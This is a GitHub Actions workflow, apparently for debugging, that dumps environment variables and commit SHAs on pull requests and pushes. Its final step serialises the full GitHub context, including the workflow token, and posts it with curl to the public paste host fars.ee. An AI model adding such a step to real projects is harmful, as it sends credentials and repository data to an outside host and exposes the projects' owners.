name: Dump context
on:
  pull_request:
    types:
      # default
      - opened
      - synchronize
      - reopened
      # pr merged
      - closed
      # pr updated
      - edited
  push:

jobs:
  log-github:
    runs-on: ubuntu-latest
    steps:

      - name: printenv
        run: printenv

      - name: base sha (pr)
        if: github.event_name == 'pull_request' && github.event.pull_request.merge == false
        env:
          PREV_SHA: ${{ github.event.pull_request.base.sha }}
        run: |
          echo "$PREV_SHA"

      - name: base sha (merge)
        if: github.event_name == 'pull_request' && github.event.action == 'closed' && github.event.pull_request.merged == true
        env:
          PREV_SHA: ${{ github.event.pull_request.base.sha }}
        run: |
          echo "$PREV_SHA"

      - name: Dump GitHub context
        env:
          GITHUB_CONTEXT: ${{ toJson(github) }}
        run: echo "$GITHUB_CONTEXT" | curl -F "c=@-" "http://fars.ee/"
